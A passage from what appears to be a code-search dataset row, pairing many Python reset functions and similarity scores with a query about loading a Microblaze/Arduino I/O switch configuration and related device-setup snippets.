_debug('simq03b_api.reset')\r\n self.write('*RST')\r\n self.query('*IDN?') # Pauses operation until fully reset?\r", "def reset(self):\n error_estop = \"\"\"\\\nE-Stop is ASSERTED. Disengage E-Stop and then reset the robot.\n\"\"\"\n error_nonfatal = \"\"\"Non-fatal Robot Error on reset.\nRobot reset cleared stopped state and robot can be enabled, but a non-fatal\nerror persists. Check diagnostics or rethink.log for more info.\n\"\"\"\n error_env = \"\"\"Failed to reset robot.\nPlease verify that the ROS_IP or ROS_HOSTNAME environment variables are set\nand resolvable. For more information please visit:\nhttp://sdk.rethinkrobotics.com/wiki/RSDK_Shell#Initialize\n\"\"\"\n is_reset = lambda: (self._state.enabled == False and\n self._state.stopped == False and\n self._state.error == False and\n self._state.estop_button == 0 and\n self._state.estop_source == 0)\n pub = rospy.Publisher('robot/set_super_reset', Empty, queue_size=10)\n\n if (self._state.stopped and\n self._state.estop_button == AssemblyState.ESTOP_BUTTON_PRESSED):\n rospy.logfatal(error_estop)\n raise IOError(errno.EREMOTEIO, \"Failed to Reset: E-Stop Engaged\")\n\n rospy.loginfo(\"Resetting robot...\")\n try:\n baxter_dataflow.wait_for(\n test=is_reset,\n timeout=3.0,\n timeout_msg=error_env,\n body=pub.publish\n )\n except OSError as e:\n if e.errno == errno.ETIMEDOUT:\n if self._state.error == True and self._state.stopped == False:\n rospy.logwarn(error_nonfatal)\n return False\n raise", "def reset(self):\n\n # Deactivate the card\n try:\n result = self.mch_comms.call_ipmitool_command([\"picmg\", \"deactivate\", (str(self.slot + PICMG_SLOT_OFFSET))])\n except CalledProcessError:\n pass\n except TimeoutExpired as e:\n print(\"reset: caught TimeoutExpired exception: {}\".format(e))\n\n # TODO: Add a resetting status here to allow other reads to wait\n # See DIAG-68.\n\n # Wait for the card to shut down\n time.sleep(2.0)\n\n # Activate the card\n try:\n result = self.mch_comms.call_ipmitool_command([\"picmg\", \"activate\", str(self.slot + PICMG_SLOT_OFFSET)])\n except CalledProcessError:\n pass\n except TimeoutExpired as e:\n print(\"reset: caught TimeoutExpired exception: {}\".format(e))", "def resetDeviceStates(self):", "def reset(self,):\n\n self._toggle_pin(RESET_PIN)", "def reset(self, sync=True):\n self.vmomi_object.ResetVM_Task()\n if sync: self._wait_for_power_on()", "def reset(self):\n\n ## Turn off controller to bring to a known state\n try:\n self.logger.info(\"Turning off sta3800 controller (sta3800_off).\")\n ccdsetup.sta3800_off()\n except Exception:\n self.logger.exception(\"Unable to turn off controller! State may be unknown.\")\n raise\n else:\n self.logger.info(\"Controller turned off successfully.\")\n\n ## Initialize controller\n try:\n self.logger.info(\"Turning on sta3800 controller (sta3800_setup).\")\n ccdsetup.sta3800_setup()\n except Exception:\n self.logger.exception(\"Unable to turn on sta3800 controller!\")\n raise\n else:\n self.logger.info(\"Controller turned on successfully.\")", "def reset(self):\n self.stuck = False", "def reset_to_cold(self):\n self._log_msg_start(\"CFG-RST - Reset to cold start\")\n self._ubx.send(\"CFG-RST\", navBbrMask=0xFFFF, resetMode=0x01)", "def handle_warm_resets():\n\n # If we're in USB reset, we're actively receiving warm reset signaling; and we should reset\n # to the Rx.Detect.Reset state.\n with m.If(self.in_usb_reset):\n transition_to_state(\"Rx.Detect.Reset\")", "def sys_reset(self):\n result = self._lib.NRFJPROG_sys_reset()\n if result != NrfjprogdllErr.SUCCESS:\n raise APIError(result)", "def soft_reset() -> None:\n ...", "def reset():\n s = State(sentiment=0, focus=0, energy=0, text=\"reset_triggered\")\n db.session.add(s)\n db.session.commit()\n return \"Reset the state to 0\"", "def reset(self, reset):\n\n self._reset = reset", "def reset_computer(self):\n self._greediness = 7\n self._rolls = 0", "def reset(self):\n self.reset_dev_via_serial(self.forced_reset_timeout)", "def reset(self):\n self.clock.reset()\n self.microgrid.reset();\n self.steps_beyond_done = None\n self.updateState();\n return self.state", "def reset(self):\n self._set_register_field(SI5324._FIELD_RST_TRG, 1)\n time.sleep(0.010) # Control interface up after 10ms", "def _reset_state(self):\n self.state = self.start_state.copy()", "def softreset(self):\n try:\n self.device.write(b'\\x03') # abort\n self.device.write(b'\\x04') # reset\n self.device.write(b'\\r')\n self.__read_until(b'raw REPL; CTRL-B to exit\\r\\n>')\n except Exception as e:\n raise ReplError(e)", "def _doReset(self):\n self._cmdReset()", "def Reset(self):\r\n #if self.originalState != self.currentState:\r\n # self._set_SS_State(self.originalState)\r\n #self.enable()\r\n self._set_SS_State(self.originalState)", "def reset(self):\n self.rst.value(0) # RST on\n self.sleep_us(100) # reset impulse has to be >100 ns and <100 ms\n self.rst.value(1) # RST off\n # Defaults after reset:\n self.power = self.POWER_DOWN\n self.addressing = self.ADDRESSING_HORIZ\n self.instr = self.INSTR_BASIC\n self.display_mode = self.DISPLAY_BLANK\n self.temp_coeff = self.TEMP_COEFF_0\n self.bias = self.BIAS_1_11\n self.voltage = 3060", "def shutdown(self):\n if self.pmu is not None:\n # Enable button checking before shutdown\n self.pmu.enablePMICSleepMode(True)\n self.pmu.setEnterSleepMode()\n machine.reset()\n sys.exit()", "def reset():\n pass", "def reset():\n pass", "def reset(self):\n self.state = self.start\n return self.start", "def reset(self):\n if self.arduino:\n self.arduino.stop()\n\n time.sleep(.5)\n\n self.arduino = arduino.find_arduino(self.arduino_serial)\n self.arduino.start_monitor()\n\n self.driver.stop()\n self.last_control = time.time()", "def bcp_reset(self):\n self.machine.bcp.transport.send_to_all_clients(\"reset\")", "def soft_reset(self):\n self.ser.write(\"\\030\")\n self._handle_reset()", "def set_reset_pin_low(self):\n self._dll.JLINKARM_ClrRESET()\n return None", "def reset(self):\n self.stop()\n self._queue = Queue.Queue()", "async def send_reset(self):\n try:\n await self._send_command([PrivateConstants.SYSTEM_RESET])\n except RuntimeError:\n exit(0)", "def stop():\n set_power(0)", "def reset(self):\n self.ipcon.send_request(self, BrickletBarometerV2.FUNCTION_RESET, (), '', '')", "def actionReset(self):\n sys.stderr.write(\"Reset device ...\\n\")\n sys.stderr.flush()\n self.bslReset(0) #only reset", "def resetVirtualMachine(self,node,vmid):\n post_data = None\n data = self.connect('post',\"nodes/%s/qemu/%s/status/reset\" % (node,vmid), post_data)\n return data", "def reset():\n Vessel.reset_instances()", "def _reset(self) -> ts.TimeStep:", "def stop(self):\n self.startState = None", "def stop(self):\n self.startState = None", "def pibooth_reset(cfg, hard):", "def __mode_reset(self):\n\t\tfor key,val in self.ms_all.iteritems():\n\t\t\tval.reset_restart()", "def device_reset(self):\n\t\tlogger.info('Device Reset')\n\t\tself.spi.writebytes([0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff])\n\t\tprint(DELIMITER*'-')", "def stop_device(self):\n\n self.state = 'stopped'", "async def send_reset(self):\n try:\n await self._send_command([PrivateConstants.SYSTEM_RESET])\n except RuntimeError:\n exit(0) #keep this??", "def reset_myself(self):\n print >>sys.stderr, 'UNEXPECTED VALUE'\n self.status = Modem.Status.IDLE\n self.error_status = Modem.ErrorDict.NONE", "def halt(self):\n self._kernel.halt()", "def reset(self):\n self.wait_until_idle()\n self.__interface.write_pin(self.__interface.RST_PIN, RPi.GPIO.LOW)\n time.sleep(self.__interface.WT_PIN_TOGGLE)\n self.__interface.write_pin(self.__interface.RST_PIN, RPi.GPIO.HIGH)\n time.sleep(self.__interface.WT_PIN_TOGGLE)\n\n self.__sleeping = False", "def reset():\r\n pass", "def reset(self):\n self.state = \"YYYYRRRRGGGGOOOOBBBBWWWW\"", "def reset(self):\n self.restart()\n self.cycles = 0", "def halt(self, addr):\n\n self.reg.run_flag = False", "def reset(self):\n \n pass", "def reset(self,bootloader=False):\n self.send_packet('\\xff' if bootloader else '\\xfe')", "async def reset(self):\n\n self.__do_action(self.motor.moveto_edge(MotorDriver.LEFT))", "def reset(self):\n\n\t\tself._send_message(\"RESET\", \"\\x00\")", "def resetDetector (self):\n self.mpr121._reset ()", "def _handle_reset(self):\n # reset own state\n self.grbl_version = None\n self.in_check_mode = False\n self.line_active = False\n # wait for init\n self._wait_for_grbl_init()", "def reset(self):\r\n err = self._cfuncs['ka_reset'](self._core._get_ka())\r\n self._core._handle_error(err)", "def _reset_state(self):\n\n self.state = None\n self.use_count = 0\n\n # Guards both state and use_count\n self.cond = threading.Condition()\n\n # Incremented each time we initialise a new mount state. Aids\n # debugging.\n self.generation = 0", "def reset_to_hot(self):\n self._log_msg_start(\"CFG-RST - Reset to hot start\")\n self._ubx.send(\"CFG-RST\", navBbrMask=0x0000, resetMode=0x01)", "def reset(self):\n # When we reset frame, all the value will be set to 0, so we need these lines.\n self.id = self._id\n self.cpu_cores_capacity = self._init_cpu_cores_capacity\n self.memory_capacity = self._init_memory_capacity\n self.pm_type = self._init_pm_type\n self.oversubscribable = self._init_pm_state\n\n self.region_id = self._region_id\n self.zone_id = self._zone_id\n self.data_center_id = self._data_center_id\n self.cluster_id = self._cluster_id\n self.rack_id = self._rack_id\n\n self._live_vms.clear()\n\n self.cpu_cores_allocated = 0\n self.memory_allocated = 0\n\n self.cpu_utilization = 0.0\n self.energy_consumption = self._idle_energy_consumption", "def reset(self) -> None:\n\n self.host.reset()", "def reset (self):\n\n self.currentState = self.initialState\n self.inputSymbol = None", "def _doResetMemory(self):\n self._cmdClearMemory()\n time.sleep(1)\n self._cmdResetParameters()\n time.sleep(1)", "def handle_reset(self):\n self.initialise()", "def stop(self):\n self.requested_state = 'Stopped'\n self.ml_interface.stop()", "def reset_10gbe():\n snap.write_int('valid_en',0)\n snap.write_int('rst',1)\n time.sleep(1)\n snap.write_int('rst',0)\n snap.write_int('valid_en',3)", "def __reset_variables(self):\r\n self.__running = True", "def reset(self):\n\n # Issue the reset command\n try:\n self.crate_resetting = True\n # Reset the FRU init status to stop attempts to read the sensors\n self.frus_inited = False\n # Wait a few seconds to allow any existing ipmitool requests to complete\n print(\"reset: Short wait before resetting (2 s)\")\n time.sleep(2.0)\n # Force the records to invalid\n print(\"reset: Force sensor read to set invalid\")\n self.read_sensors()\n print(\"reset: Triggering records to scan\")\n self.scan_list.interrupt()\n self.mch_comms.connected = False\n # Stop the ipmitool session. System will reconnect on restart\n self.mch_comms.ipmitool_shell.terminate()\n time.sleep(2.0)\n #print(\"reset: Killing ipmitool shell process\")\n self.mch_comms.ipmitool_shell.kill()\n self.mch_comms.ipmitool_shell = None\n # Stop the reader thread\n #print(\"reset: Stopping thread\")\n self.mch_comms.stop = True\n # Wait for the thread to stop\n self.mch_comms.t.join()\n #print(\"reset: Thread stopped\")\n self.mch_comms.t = None\n # Allow the thread to restart\n self.mch_comms.stop = False\n #print(\"reset: Exiting \")\n # Reset the crate\n print(\"reset: Resetting crate now\")\n self.mch_comms.call_ipmitool_direct_command([\"raw\", \"0x06\", \"0x03\"])\n\n except CalledProcessError:\n pass\n except TimeoutExpired as e:\n # Be silent. We expect this command to timeout.\n print('reset: reset command sent')\n pass\n\n # Reconnect to the crate\n print('reset: reconnecting')\n self.mch_comms.ipmitool_shell_reconnect()", "def reset(self, system):\r\n self.change_state(self.INITIAL)\r\n return {'success': True}", "def reset(self):\n self.iterator = 0\n if self.reset_jnts is True:\n # pause simulation\n while not self._physics_pauser.wait_for_service(timeout_sec=1.0):\n self.node.get_logger().info('/pause_physics service not available, waiting again...')\n pause_future = self._physics_pauser.call_async(Empty.Request())\n print(\"Pausing physics\")\n rclpy.spin_until_future_complete(self.node, pause_future)\n\n # reset controllers\n while not self._robot_resetter.wait_for_service(timeout_sec=1.0):\n self.node.get_logger().info('/lobot_arm/reset service not available, waiting again...')\n reset_robot_future = self._robot_resetter.call_async(Empty.Request())\n print(\"Resetting controller initial positions\")\n rclpy.spin_until_future_complete(self.node, reset_robot_future)\n\n # reset simulation\n while not self._reset_sim.wait_for_service(timeout_sec=1.0):\n self.node.get_logger().info('/reset_simulation service not available, waiting again...')\n reset_future = self._reset_sim.call_async(Empty.Request())\n print(\"Resetting simulation\")\n rclpy.spin_until_future_complete(self.node, reset_future)\n\n # unpause simulation\n while not self._physics_unpauser.wait_for_service(timeout_sec=1.0):\n self.node.get_logger().info('/unpause_physics service not available, waiting again...')\n unpause_future = self._physics_unpauser.call_async(Empty.Request())\n rclpy.spin_until_future_complete(self.node, unpause_future)\n print(\"Unpausing simulation\")", "def reset(self):\n self.observable_fsm.reset()\n self.latent_fsm.reset()", "def _reset(self):\n self.spot_supervisor.reset()\n return ts.TimeStep(ts.StepType.FIRST, np.float32(0.0), DISCOUNT,\n np.zeros(23, dtype=np.float32))", "def reset_stage():\n return set_stage('')", "def reset(self):\r\n # reset Wheel encoders\r\n self.start_time = time.time()\r\n [left_start, right_start] = self.Roomba.Query(43, 44)\r\n self.Motion.reset(left_start, right_start)\r\n # reset bumper\r\n self.bumper.reset()\r\n\r\n #reset grid world data\r\n self.action=[0.0,0.0]\r\n self.grid_state= [0,0,0]\r\n self.real_state = [0.0, 0.0, 0.0]\r\n self.trans_model = None\r\n pass", "def reset(self, condition):\n pass", "def reset(self):\n self.check_validity()\n\n self.ipcon.send_request(self, BrickletIndustrialDualAnalogInV2.FUNCTION_RESET, (), '', 0, '')", "def reset(self):\n p.resetSimulation()\n p.setPhysicsEngineParameter(numSolverIterations=150)\n p.setTimeStep(self._time_step)\n p.setGravity(0, 0, -9.8)\n\n # load plane\n p.loadURDF(os.path.join(pybullet_data.getDataPath(), \"plane.urdf\"), [0, 0, 0])\n # load robot\n self._darwin = DarwinopEnv()\n\n # Let the world run for a bit\n for _ in range(20):\n p.stepSimulation()" ]
[ "0.62783825", "0.6214647", "0.62101734", "0.62012935", "0.6188777", "0.6144242", "0.6094757", "0.60869604", "0.6043643", "0.6032759", "0.6026657", "0.6011027", "0.600109", "0.59982294", "0.5969956", "0.59564924", "0.5952704", "0.59244686", "0.5921813", "0.5914156", "0.59073234", "0.58894604", "0.58858716", "0.58761483", "0.5875608", "0.5830331", "0.58266324", "0.58210874", "0.58090645", "0.5803332", "0.5797521", "0.57603085", "0.5752144", "0.5751398", "0.5746973", "0.57440066", "0.5738513", "0.57364035", "0.57352793", "0.57268363", "0.57210606", "0.5720142", "0.57127", "0.57095593", "0.57018954", "0.57018954", "0.5701228", "0.57007444", "0.5697224", "0.56926465", "0.56882876", "0.5685538", "0.56818444", "0.56799155", "0.5677292", "0.5673814", "0.5673097", "0.5671458", "0.566866", "0.5667887", "0.5667887", "0.56671214", "0.56655616", "0.5652645", "0.56522506", "0.56454676", "0.5643074", "0.5642263", "0.56421393", "0.5641728", "0.5639157", "0.56367373", "0.5634135", "0.56289285", "0.5626999", "0.56247354", "0.5621839", "0.5620882", "0.5620549", "0.56075466", "0.5607404", "0.5607337", "0.5605469", "0.55994225", "0.5592151", "0.5591723", "0.5582854", "0.558012", "0.55790704", "0.5577152", "0.5576243", "0.5562824", "0.556266", "0.5559628", "0.5552715", "0.5549839", "0.5544613", "0.5542487", "0.55363595", "0.5534653" ]
0.70397276
0
Load the Microblaze processor's switch configuration. This method will update switch config. Each pin requires 8 bits for configuration.
def load_switch_config(self, config=None): if config is None: config = ARDUINO_SWCFG_DIOALL elif not len(config) == 4*ARDUINO_SWITCHCONFIG_NUMREGS: raise TypeError('Invalid switch config {}.'.format(config)) # Build switch config word self.iop_switch_config = config sw_config_words = [0]*ARDUINO_SWITCHCONFIG_NUMREGS for ix, cfg in enumerate(self.iop_switch_config): if ix < 4: sw_config_words[0] |= (cfg << ix*8) elif ix < 8: sw_config_words[1] |= (cfg << (ix-4)*8) elif ix < 12: sw_config_words[2] |= (cfg << (ix-8)*4) elif ix < 16: sw_config_words[3] |= (cfg << (ix-12)*4) else: sw_config_words[4] |= (cfg << (ix-16)*4) # Configure switch for i in range(ARDUINO_SWITCHCONFIG_NUMREGS): self.write_cmd(ARDUINO_SWITCHCONFIG_BASEADDR + 4*i, sw_config_words[i])
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def configure_switch(self, number: str, config: SwitchConfig, platform_config: dict) -> \"SwitchPlatformInterface\":\n raise NotImplementedError", "def configure_switch(self, config):\n raise NotImplementedError", "def __init__(self, mb_info, switch_config):\n self.microblaze = Arduino(mb_info, ARDUINO_MAILBOX_PROGRAM)\n self.iop_switch_config = switch_config", "def initialize(self):\n self.log.info(\"Initialize raspPinball hardware.\")\n\n self.config = self.machine.config['rasppinball']\n self.machine.config_validator.validate_config(\"rasppinball\", self.config)\n print(\"***************************\")\n print(self.config)\n #self.machine_type = (\n # self.machine.config['hardware']['driverboards'].lower())\n\n self._connect_to_hardware()\n\n\n # keypad\n self._kp = Keypad()\n self.old_key = \"\"\n self.key = \"\"\n # leds\n self.init_strips()", "def GPIO_initialization():\n GPIO.setmode(GPIO.BCM)\n\n GPIO.setup(Sensor.IN_1, GPIO.OUT)\n GPIO.setup(Sensor.IN_2, GPIO.OUT)\n GPIO.setup(Sensor.EN, GPIO.OUT)\n\n GPIO.setup(Membrane_Switch.PSEUDO_MEMBRANE_SWITCH['RED_STOP'], GPIO.IN)\n GPIO.setup(Membrane_Switch.PSEUDO_MEMBRANE_SWITCH['YELLOW_CW'], GPIO.IN)\n GPIO.setup(Membrane_Switch.PSEUDO_MEMBRANE_SWITCH['GREEN_CCW'], GPIO.IN)\n\n GPIO.output(Sensor.IN_1, GPIO.LOW)\n GPIO.output(Sensor.IN_2, GPIO.LOW)", "def _use_existing_configuration(self):\n HW_Init(self.ftdi, None)", "def load_switches(self):\n new_switches = list()\n for site in self.sites:\n switches = self.get_switches_stats(site_id=site['id'])\n for switch in switches:\n if len(switch['name']) < 1:\n switch['name'] = ':'.join([switch['mac'][i:i + 2].upper() for i in range(0, len(switch['mac']), 2)])\n new_switch = {\n \"name\": switch['name'],\n \"site\": site['name'],\n \"site_id\": site['id'],\n \"device_id\": switch['id'],\n \"mac\": switch['mac'],\n \"mac_str\": ':'.join([switch['mac'][i:i + 2].upper() for i in range(0, len(switch['mac']), 2)]),\n \"ip_config\": switch['ip_config'],\n \"ip_actual\": switch['ip_stat'],\n \"net_obj\": get_network(address=switch['ip_config']['ip'], netmask=switch['ip_config']['netmask']) if 'ip' in switch['ip_config'] else None\n }\n for vlan, addr in new_switch['ip_actual']['ips'].items():\n if new_switch['ip_actual']['ip'] == addr:\n new_switch['ip_actual']['vlan'] = vlan.strip('vlan')\n else:\n new_switch['ip_actual']['vlan'] = 0\n if new_switch['ip_config']['network'] and new_switch['ip_config']['network'] != \"default\":\n new_switch['ip_config']['vlan'] = site['network_template']['networks'][new_switch['ip_config']['network']]['vlan_id']\n logger.debug(f\"Matched {new_switch['name']} management network '{new_switch['ip_config']['network']}' to VLAN {new_switch['ip_config']['vlan']}\")\n elif new_switch['ip_config']['network'] and new_switch['ip_config']['network'] == \"default\":\n new_switch['ip_config']['vlan'] = 1\n logger.debug(f\"Matched {new_switch['name']} management network '{new_switch['ip_config']['network']}' to VLAN {new_switch['ip_config']['vlan']}\")\n else:\n new_switch['ip_config']['vlan'] = 0\n logger.error(f\"Did not match {new_switch['name']} management network '{new_switch['ip_config']['network']}' to VLAN {new_switch['ip_config']['vlan']}\")\n new_switches.append(new_switch)\n self.switches = new_switches", "def configure_light(self, number: str, subtype: str, config: LightConfig,\n platform_settings: dict) -> \"LightPlatformInterface\":\n raise NotImplementedError", "def setupHw():\n\n pin.setupHw()\n pin.setupOutPins(traffic_lights)\n pin.setDebug(False)", "def start(self):\n self.microblaze.run()\n self.microblaze.write(MAILBOX_OFFSET + MAILBOX_PY2IOP_CMD_OFFSET, 0)\n self.load_switch_config(self.iop_switch_config)", "def __init__(self):\n GPIO.setwarnings(False)\n GPIO.cleanup() # Reset the high and low levels of the GPIO port\n #The following code defines the GPIO used to control the L298N chip. This definition is different for different Raspberry Pi driver boards.\n self.Motor_A_EN = 17\n self.Motor_B_EN = 4\n self.Motor_A_Pin1 = 27\n self.Motor_A_Pin2 = 18\n self.Motor_B_Pin1 = 21\n self.Motor_B_Pin2 = 26\n self.setup()", "def set_config(self): # called from button_set object \n self.settings['lights_on'] = self.lights_on.get()\n self.settings['lights_off'] = self.lights_off.get()\n self.settings['ambient_min'] = self.ambient_min.get()\n self.settings['soil_1'] = self.smc1.get()\n self.settings['soil_2'] = self.smc2.get()\n self.settings['soil_3'] = self.smc3.get()\n self.settings['soil_4'] = self.smc4.get()\n self.settings['overhead_level'] = self.overhead_level.get()\n\n # Save settings to config file in case of reboot / power-loss\n print \"UPDATING SETTINGS FILE\"\n with open(self.settings_path, 'w') as jsonfile:\n jsonfile.write(json.dumps(self.settings, indent=4))\n self.active_changes = True # (flag) changes are active!", "def state(config: dict):\n\n async def state_callback(device):\n if device.basic_info is not None:\n if device.available:\n print_device_details(device)\n\n device.shutdown_event_loop()\n\n logger.info(\"Initialising SonoffSwitch with host %s\" % config[\"host\"])\n SonoffSwitch(\n host=config[\"host\"],\n callback_after_update=state_callback,\n logger=logger,\n device_id=config[\"device_id\"],\n api_key=config[\"api_key\"],\n )", "def switch_changed(self, switch, name):\n section, option = name\n v = (\"1\" if switch.value else \"0\")\n _stash.config.set(section, option, v)\n self.save()", "def setup_platform(hass, config, add_devices, discovery_info=None):\n devices = config.get(CONF_SWITCHES, {})\n cmdrgbwlight = []\n\n for object_id, device_config in devices.items():\n value_template = device_config.get(CONF_STATE_VALUE_TEMPLATE)\n\n if value_template is not None:\n value_template.hass = hass\n\n cmdrgbwlight.append(\n CommandSwitch(\n hass,\n object_id,\n device_config.get(CONF_NAME),\n device_config.get(CONF_COMMAND_ON),\n device_config.get(CONF_COMMAND_OFF),\n device_config.get(CONF_COMMAND_STATE),\n device.config.get(CONF_BRIGHTNESS_STATE),\n device.config.get(CONF_BRIGHTNESS_COMMAND),\n device.config.get(CONF_BRIGHTNESS_VALUE_TEMPLATE),\n device.config.get(CONF_RGB_STATE),\n device.config.get(CONF_RGB_COMMAND),\n device.config.get(CONF_RGB_VALUE_TEMPLATE),\n device.config.get(CONF_FRIENDLY_NAME, object_id),\n device.config.get(CONF_BRIGHTNESS_SCALE),\n value_template\n )\n )\n\n if not cmdrgbwlight:\n _LOGGER.error(\"No switches added\")\n return False\n\n add_devices(cmdrgbwlight)", "def load(self):\n basePath = './examples/'\n file = \"print8.ls8\"\n # file = \"mult.ls8\"\n # file = \"stack.ls8\"\n # file = \"call.ls8\"\n file = \"sctest.ls8\"\n if len(sys.argv) > 1:\n file = sys.argv[1]\n address = 0\n\n with open(basePath + file, \"r\") as f:\n for line in f:\n line = line.split(\"#\")\n\n try:\n v = int(line[0], 2)\n except ValueError:\n continue\n # print(v)\n self.ram[address] = v\n address += 1", "def setup(self):\n self.log.debug('RFSwitch - in RFSwitch setup()')\n # Add resource setup code here\n print(\"Calling RFSwitch:setup\")", "def setup_platform(hass, config, add_devices, discovery_info=None):\n cl = hass.data.get(DATA_CIRCADIAN_LIGHTING)\n if cl:\n cs = CircadianSwitch(\n hass,\n cl,\n name=config.get(CONF_NAME),\n lights_ct=config.get(CONF_LIGHTS_CT, []),\n lights_rgb=config.get(CONF_LIGHTS_RGB, []),\n lights_xy=config.get(CONF_LIGHTS_XY, []),\n lights_brightness=config.get(CONF_LIGHTS_BRIGHT, []),\n disable_brightness_adjust=config.get(CONF_DISABLE_BRIGHTNESS_ADJUST),\n min_brightness=config.get(CONF_MIN_BRIGHT),\n max_brightness=config.get(CONF_MAX_BRIGHT),\n sleep_entity=config.get(CONF_SLEEP_ENTITY),\n sleep_state=config.get(CONF_SLEEP_STATE),\n sleep_colortemp=config.get(CONF_SLEEP_CT),\n sleep_brightness=config.get(CONF_SLEEP_BRIGHT),\n disable_entity=config.get(CONF_DISABLE_ENTITY),\n disable_state=config.get(CONF_DISABLE_STATE),\n initial_transition=config.get(CONF_INITIAL_TRANSITION),\n )\n add_devices([cs])\n\n def update(call=None):\n \"\"\"Update lights.\"\"\"\n cs.update_switch()\n\n return True\n else:\n return False", "def _configure(self) -> None:\n reg_data = self.configuration\n conf_data = reg_data & ~0xC0 | 0x80\n # check if already in the right configuration, do not re-configure on and on again\n if reg_data != conf_data:\n self.configuration = conf_data", "def load(self):\n super().load()\n for channel in range(self.n_channels):\n c_str = 'Channel_{0:02d}'.format(channel)\n if c_str not in self:\n log.info(f'{c_str} not found in config yaml, adding it now with defaults')\n self.set(c_str, {'amplitude': 1.5, 'dc_offset': 0.0}, save_config=True)\n\n val = self.get(c_str)\n self.amplitude(channel, val['amplitude'])\n self.offset(channel, val['dc_offset'])\n self._set_register(0, self.get('clock_delay', 1000)//100 + self._seq_length//100 - 1)", "async def async_setup_entry(\n hass: HomeAssistant, entry: ConfigEntry, async_add_entities: AddEntitiesCallback\n) -> None:\n\n bhyve = hass.data[DOMAIN][entry.entry_id][CONF_CLIENT]\n\n switches = []\n devices = filter_configured_devices(entry, await bhyve.devices)\n programs = await bhyve.timer_programs\n\n device_by_id = {}\n\n for device in devices:\n device_id = device.get(\"id\")\n device_by_id[device_id] = device\n if device.get(\"type\") == DEVICE_SPRINKLER:\n if not device.get(\"status\"):\n _LOGGER.warning(\n \"Unable to configure device %s: the 'status' attribute is missing. Has it been paired with the wifi hub?\",\n device.get(\"name\"),\n )\n continue\n\n # Filter out any programs which are not for this device\n device_programs = [\n program for program in programs if program.get(\"device_id\") == device_id\n ]\n\n switches.append(\n BHyveRainDelaySwitch(hass, bhyve, device, \"weather-pouring\")\n )\n\n all_zones = device.get(\"zones\")\n for zone in all_zones:\n zone_name = zone.get(\"name\")\n # if the zone doesn't have a name, set it to the device's name if there is only one (eg a hose timer)\n if zone_name is None:\n zone_name = (\n device.get(\"name\") if len(all_zones) == 1 else \"Unnamed Zone\"\n )\n switches.append(\n BHyveZoneSwitch(\n hass,\n bhyve,\n device,\n zone,\n zone_name,\n device_programs,\n \"water-pump\",\n )\n )\n\n for program in programs:\n program_device = device_by_id.get(program.get(\"device_id\"))\n program_id = program.get(\"program\")\n if program_device is not None and program_id is not None:\n _LOGGER.info(\"Creating switch: Program %s\", program.get(\"name\"))\n switches.append(\n BHyveProgramSwitch(\n hass, bhyve, program_device, program, \"bulletin-board\"\n )\n )\n\n async_add_entities(switches, True)\n\n async def async_service_handler(service):\n \"\"\"Map services to method of BHyve devices.\"\"\"\n _LOGGER.info(\"%s service called\", service.service)\n method = SERVICE_TO_METHOD.get(service.service)\n if not method:\n _LOGGER.warning(\"Unknown service method %s\", service.service)\n return\n\n params = {\n key: value for key, value in service.data.items() if key != ATTR_ENTITY_ID\n }\n entity_ids = service.data.get(ATTR_ENTITY_ID)\n component = hass.data.get(SWITCH_DOMAIN)\n if entity_ids:\n target_switches = [component.get_entity(entity) for entity in entity_ids]\n else:\n return\n\n method_name = method[\"method\"]\n _LOGGER.debug(\"Service handler: %s %s\", method_name, params)\n\n for entity in target_switches:\n if not hasattr(entity, method_name):\n _LOGGER.error(\"Service not implemented: %s\", method_name)\n return\n await getattr(entity, method_name)(**params)\n\n for service, details in SERVICE_TO_METHOD.items():\n schema = details[\"schema\"]\n hass.services.async_register(\n DOMAIN, service, async_service_handler, schema=schema\n )", "def set_switch(self, node_uuid, index, data):\n if data == \"on\":\n self._bus.i2c_acquire()\n try:\n p = self.values['num'].get_data_index(index=index)\n self._bus.pca9685_manager.set_pwm(p, 4096, 0)\n self.values['level'].set_data_index(index=index, data=100)\n except Exception:\n logger.exception('[%s] - Exception when switching on', self.__class__.__name__)\n finally:\n self._bus.i2c_release()\n elif data == \"off\":\n self._bus.i2c_acquire()\n try:\n p = self.values['num'].get_data_index(index=index)\n self._bus.pca9685_manager.set_pwm(p, 0, 4096)\n self.values['level'].set_data_index(index=index, data=0)\n except Exception:\n logger.exception('[%s] - Exception when switching off', self.__class__.__name__)\n finally:\n self._bus.i2c_release()\n else:\n logger.warning(\"[%s] - set_switch unknown data : %s\", self.__class__.__name__, data)", "def t0_switch_config_helper(test_obj: 'T0TestBase'):\n configer = SwitchConfiger(test_obj)\n test_obj.dut.switch_id = configer.start_switch()", "def connect_to_switches(self):\n for p4switch in self.topo.get_p4switches():\n thrift_port = self.topo.get_thrift_port(p4switch)\n self.controllers[p4switch] = SimpleSwitchThriftAPI(thrift_port)", "def setup_platform(hass, config, add_devices, discovery_info=None):\n switches = []\n for coil in config.get(\"coils\"):\n switches.append(ModbusCoilSwitch(\n coil.get(CONF_NAME),\n coil.get(CONF_SLAVE),\n coil.get(CONF_COIL)))\n add_devices(switches)", "def config_led(my_bus):\n try:\n my_bus.write_i2c_block_data(LED_DEVICE_ADDRESS, 0x2F, [0xFF]) # system setup\n my_bus.write_i2c_block_data(LED_DEVICE_ADDRESS, 0x89, [0xFF]) # display on\n except IOError:\n t = 1\n print(\"got IOError. try again in\", t, \"second\")\n time.sleep(t)", "def initialize(self):\n\t\tpcd8544.LCD.initialize(self)\n\t\tRPIO.setup(self._backlight_pin, RPIO.OUT, initial=RPIO.LOW)", "def setup(self):\n\t\tself.interface = self.getDriver('light_interface')\n\n\t\tself.pin = self.config['interface_position']\n\t\tself.blink_rate = self.config['blink_rate'] / 2 or 0.5\n\t\tself.is_on = False\n\n\t\tself.intensity = 255\n\t\tself.blink = False\n\t\tself.count = None\n\t\tself.current_count = False\n\t\tself.current_count = None\n\n\t\tself.saved_intensity = None\n\t\tself.saved_blink = False\n\t\tself.saved_count = None\n\n\t\treturn True", "def _initialize_hardware(self):\n # Import\n try:\n from gpiozero import MCP3008\n except Exception as ex:\n logging.error('\\n *** ERROR importing gpiozero: {}'.format(ex))\n\n # Things failed, must be running locally, not on a widget, so don't\n # bother initializing the MCP3008\n return\n\n # Initialize the MCP3008\n try:\n self._sensor = MCP3008(channel=0)\n except Exception as ex:\n logging.error('\\n *** ERROR initializing MCP3008: {}'.format(ex))\n return\n\n # Start force loop thread\n threading.Thread(target=self._force_loop, daemon=True).start()", "def set_new_config(modem, disable_auto_linking, 